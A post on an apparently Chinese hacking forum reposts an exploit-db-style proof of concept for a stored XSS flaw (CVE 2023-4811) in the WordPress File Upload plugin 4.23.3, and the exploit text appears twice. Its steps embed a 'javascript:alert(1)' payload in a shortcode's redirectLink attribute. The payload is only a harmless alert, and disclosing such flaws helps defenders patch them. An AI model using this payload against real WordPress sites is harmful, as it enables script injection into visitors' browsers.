H HackApt-37 Team已验证会员 黑客倉庫站長 贡献: 83% 04 9, 2025 #1 exploit title: WordPress文件上传4.23.3存储的XSS(CVE 2023-4811) 日期: 2023年12月18日 剥削作者: faiyaz ahmad 供应商HomePage: https://wordpress.com/ 版本: 4.23.3 CVE : CVE 2023-4811 概念证明: 1。登录到WordPress帐户 2。将以下短代码添加到'文件上传插件中的帖子中 [wordpress_file_upload redirect='true'redirectLink='[I]javascript:alert(1)[/I]'] 3。将任何文件上传到结果帖子上。 4。上传完成后,您将在浏览器中看到XSS警报。 H Webigniter V28.7.23-存储的XSS H VM2-沙盒逃生 点击展开... 好评 0 否决票
exploit title: WordPress文件上传4.23.3存储的XSS(CVE 2023-4811) 日期: 2023年12月18日 剥削作者: faiyaz ahmad 供应商HomePage: https://wordpress.com/ 版本: 4.23.3 CVE : CVE 2023-4811 概念证明: 1。登录到WordPress帐户 2。将以下短代码添加到'文件上传插件中的帖子中 [wordpress_file_upload redirect='true'redirectLink='[I]javascript:alert(1)[/I]'] 3。将任何文件上传到结果帖子上。 4。上传完成后,您将在浏览器中看到XSS警报。 H Webigniter V28.7.23-存储的XSS H VM2-沙盒逃生
